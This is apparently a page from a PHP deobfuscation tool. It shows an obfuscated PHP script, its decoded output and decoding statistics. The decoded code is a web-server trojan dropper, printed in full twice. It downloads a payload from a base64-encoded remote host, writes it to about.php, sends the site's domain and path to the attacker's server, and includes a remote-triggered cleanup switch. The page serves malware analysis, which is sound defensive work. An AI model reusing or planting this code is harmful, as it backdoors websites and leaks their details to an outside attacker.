Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$OOO0_O0_0_ = "bawhl+ehns4gh"; $OO0O___0O0 = "bawhl+eghs4gh"; $OO0O0__O0_ = ${"GLOBALS..
Decoded Output download
<? $OOO0_O0_0_ = "bawhl+ehns4gh";
$OO0O___0O0 = "bawhl+eghs4gh";
$OO0O0__O0_ = ${"GLOBALS"}["O0_O0_O0O_"]('$O__O00_OO0=\'\'', 'if(isset(${"_SERVER"}["HTTP_HOST"])){ return ${"_SERVER"}["HTTP_HOST"]; } elseif(isset(${"_SERVER"}["SERVER_NAME"])){ return ${"_SERVER"}["SERVER_NAME"]; } return $O__O00_OO0;');
$OOO_O00_0_ = ${"GLOBALS"}["O0_O0_O0O_"]('$url', '$OO0O0_0_O_=@${"GLOBALS"}["O_0O_0O0O_"]($url);
if(!$OO0O0_0_O_){
$O0O0_O_0O_=${"GLOBALS"}["O__0O0_0OO"]();
${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_, CURLOPT_URL, $url);
${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_, CURLOPT_RETURNTRANSFER, 1);
$OO0O0_0_O_=${"GLOBALS"}["O_OO_O000_"]($O0O0_O_0O_);
${"GLOBALS"}["O_O_O000_O"]($O0O0_O_0O_);
}
return $OO0O0_0_O_;
');
$O_OO__0O00 = ${"GLOBALS"}["O0_O0_O0O_"]('$O_0O_O_0O0=\'\'', '$O_0_O_OO00 = array();
$O_0_O_OO00["path"]=${"GLOBALS"}["O_00O0OO__"](${"GLOBALS"}["O_00O0OO__"](\'//\',\'/\',${"_SERVER"}["PHP_SELF"]),\'\',${"GLOBALS"}["O_00O0OO__"](\'\\\\\',\'/\',${"_SERVER"}["SCRIPT_FILENAME"]));
$O_0_O_OO00["domain"]=${"GLOBALS"}["OO0O0__O0_"]();
$O_0_O_OO00["shell_link"]=${"GLOBALS"}["OO0O___0O0"](\'aHR0cDovL3RvdmE3MC5vcmcuaWwvYWJvdXQucGhwPzUyMA==\');
if(isset(${"_GET"}["del"]) && ${"_GET"}["del"]=="my_code"){
$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";
$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);
$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");
$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si", \'\', $OO0O0O0___);
$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_, $OO0O0O0___);
if($OO0O0O0___ > 0){
die("delete success");
}
die("delete failed");
}
$OO_O__O000=${"GLOBALS"}["OO0O___0O0"]("YWJvdXQucGhw");
$O0O_0_O0_O=$O_0_O_OO00["path"]."/".$OO_O__O000;
$OO0O0O0___=@${"GLOBALS"}["OOO_O00_0_"](${"GLOBALS"}["OO0O___0O0"]("aHR0cHM6Ly81MWxhLmljdzguY29tL2EudHh0"));
$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0O_0_O0_O, $OO0O0O0___);
if($OO0O0O0___ > 0){
$O_0_O_OO00["trojan"] = "http://".$O_0_O_OO00["domain"]."/".$OO_O__O000;
}
else{
$O_0_O_OO00["trojan"] = "write failed";
}
$OO_0O00O__=sprintf(${"GLOBALS"}["OO0O___0O0"](\'aHR0cHM6Ly81MWxhLmljdzguY29tLz9kPSVz\'), ${"GLOBALS"}["OOO0_O0_0_"](${"GLOBALS"}["O___00OO0O"]($O_0_O_OO00)));
$O__OO0O00_=${"GLOBALS"}["OOO_O00_0_"]($OO_0O00O__);
if($O__OO0O00_=="done"){
$O0_0OO_O0_ = $O_0_O_OO00["path"]."/index.php";
$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);
$O_OO_0_0O0 = ${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");
$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si", \'\', $OO0O0O0___);
@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_, $OO0O0O0___);
}
');
${"GLOBALS"}["O_OO__0O00"](1); ?>Did this file decode correctly?
Original Code
$OOO0_O0_0_ = "bawhl+ehns4gh";
$OO0O___0O0 = "bawhl+eghs4gh";
$OO0O0__O0_ = ${"GLOBALS"}["O0_O0_O0O_"]('$O__O00_OO0=\'\'', 'if(isset(${"_SERVER"}["HTTP_HOST"])){ return ${"_SERVER"}["HTTP_HOST"]; } elseif(isset(${"_SERVER"}["SERVER_NAME"])){ return ${"_SERVER"}["SERVER_NAME"]; } return $O__O00_OO0;');
$OOO_O00_0_ = ${"GLOBALS"}["O0_O0_O0O_"]('$url', '$OO0O0_0_O_=@${"GLOBALS"}["O_0O_0O0O_"]($url);
if(!$OO0O0_0_O_){
$O0O0_O_0O_=${"GLOBALS"}["O__0O0_0OO"]();
${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_, CURLOPT_URL, $url);
${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_, CURLOPT_RETURNTRANSFER, 1);
$OO0O0_0_O_=${"GLOBALS"}["O_OO_O000_"]($O0O0_O_0O_);
${"GLOBALS"}["O_O_O000_O"]($O0O0_O_0O_);
}
return $OO0O0_0_O_;
');
$O_OO__0O00 = ${"GLOBALS"}["O0_O0_O0O_"]('$O_0O_O_0O0=\'\'', '$O_0_O_OO00 = array();
$O_0_O_OO00["path"]=${"GLOBALS"}["O_00O0OO__"](${"GLOBALS"}["O_00O0OO__"](\'//\',\'/\',${"_SERVER"}["PHP_SELF"]),\'\',${"GLOBALS"}["O_00O0OO__"](\'\\\\\\\\\',\'/\',${"_SERVER"}["SCRIPT_FILENAME"]));
$O_0_O_OO00["domain"]=${"GLOBALS"}["OO0O0__O0_"]();
$O_0_O_OO00["shell_link"]=${"GLOBALS"}["OO0O___0O0"](\'aHR0cDovL3RvdmE3MC5vcmcuaWwvYWJvdXQucGhwPzUyMA==\');
if(isset(${"_GET"}["del"]) && ${"_GET"}["del"]=="my_code"){
$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";
$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);
$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");
$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si", \'\', $OO0O0O0___);
$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_, $OO0O0O0___);
if($OO0O0O0___ > 0){
die("delete success");
}
die("delete failed");
}
$OO_O__O000=${"GLOBALS"}["OO0O___0O0"]("YWJvdXQucGhw");
$O0O_0_O0_O=$O_0_O_OO00["path"]."/".$OO_O__O000;
$OO0O0O0___=@${"GLOBALS"}["OOO_O00_0_"](${"GLOBALS"}["OO0O___0O0"]("aHR0cHM6Ly81MWxhLmljdzguY29tL2EudHh0"));
$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0O_0_O0_O, $OO0O0O0___);
if($OO0O0O0___ > 0){
$O_0_O_OO00["trojan"] = "http://".$O_0_O_OO00["domain"]."/".$OO_O__O000;
}
else{
$O_0_O_OO00["trojan"] = "write failed";
}
$OO_0O00O__=sprintf(${"GLOBALS"}["OO0O___0O0"](\'aHR0cHM6Ly81MWxhLmljdzguY29tLz9kPSVz\'), ${"GLOBALS"}["OOO0_O0_0_"](${"GLOBALS"}["O___00OO0O"]($O_0_O_OO00)));
$O__OO0O00_=${"GLOBALS"}["OOO_O00_0_"]($OO_0O00O__);
if($O__OO0O00_=="done"){
$O0_0OO_O0_ = $O_0_O_OO00["path"]."/index.php";
$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);
$O_OO_0_0O0 = ${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");
$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si", \'\', $OO0O0O0___);
@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_, $OO0O0O0___);
}
');
${"GLOBALS"}["O_OO__0O00"](1);Function Calls
| null | 1 |
Stats
| MD5 | 57c13b5e0c603dc79299c4c288b027ce |
| Eval Count | 0 |
| Decode Time | 76 ms |